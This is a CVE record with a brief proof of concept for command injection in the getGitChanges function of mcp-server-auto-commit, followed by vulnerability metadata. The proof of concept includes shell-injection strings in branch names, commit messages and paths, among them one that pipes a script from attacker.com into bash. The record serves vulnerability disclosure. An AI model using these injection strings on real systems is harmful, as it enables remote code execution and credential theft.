CVE-2026-4198

// CVE-2026-4198 PoC - Command Injection in mcp-server-auto-commit // Target: hypermodel-labs/mcp-server-auto-commit v1.0.0 // Attack Vector: Malicious Git branch/commit message injection // Example 1: Malicious branch name injection const maliciousBranch = 'test;$(whoami)>pwned.txt;#'; // When processed by getGitChanges(), executes: git branch test;$(whoami)>pwned.txt;# // Example 2: Backtick command substitution const maliciousCommit = 'Initial commit`whoami`test'; // Executes: git commit -m "Initial commit`whoami`test" // Example 3: Pipe chain execution const maliciousPath = 'file.txt|cat /etc/passwd'; // Executes: git diff file.txt|cat /etc/passwd // Exploitation scenario: // 1. Attacker clones a repository // 2. Creates a branch with malicious name: git checkout -b "test;$(curl http://attacker.com/shell.sh|bash)" // 3. The mcp-server-auto-commit plugin processes this branch name // 4. Command injection occurs when getGitChanges() is called // Recommended verification: // Check if the following returns unexpected output: // node -e "const {getGitChanges} = require('./index.ts'); getGitChanges();"

{"cve": {"id": "CVE-2026-4198", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:04.360", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in hypermodel-labs mcp-server-auto-commit 1.0.0. Affected by this vulnerability is the function getGitChanges of the file index.ts. This manipulation causes command injection. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. Patch name: f7d992c830c5f2ec5749852e66c0195e3ed7fe30. Applying a patch is the recommended action to fix this issue. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en hypermodel-labs mcp-server-auto-commit 1.0.0. Afectada por esta vulnerabilidad es la función getGitChanges del archivo index.ts. Esta manipulación causa inyección de comandos. El ataque solo puede ser ejecutado localmente. El exploit ha sido divulgado públicamente y puede ser utilizado. Nombre del parche: f7d992c830c5f2ec5749852e66c0195e3ed7fe30. Aplicar un parche es la acción recomendada para solucionar este problema. El proyecto fue informado del problema tempranamente a través de un informe de problemas pero aún no ha respondido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/hypermodel-labs/mcp-server-auto-commit/", "source": "[email protected]"}, {"url": "https://github.com/hypermodel-labs/mcp-server-auto-commit/issues/7", "source": "[email protected]"}, {"url": "https://github.com/hypermodel-labs/mcp-server-auto-commit/pull/8/changes/f7d992c830c5f2ec5749852e66c0195e3ed7fe30", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/25687034/mcp-server-auto-commit_security_advisory.pdf", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351110", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351110", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770421", "source": "[email protected]"}]}}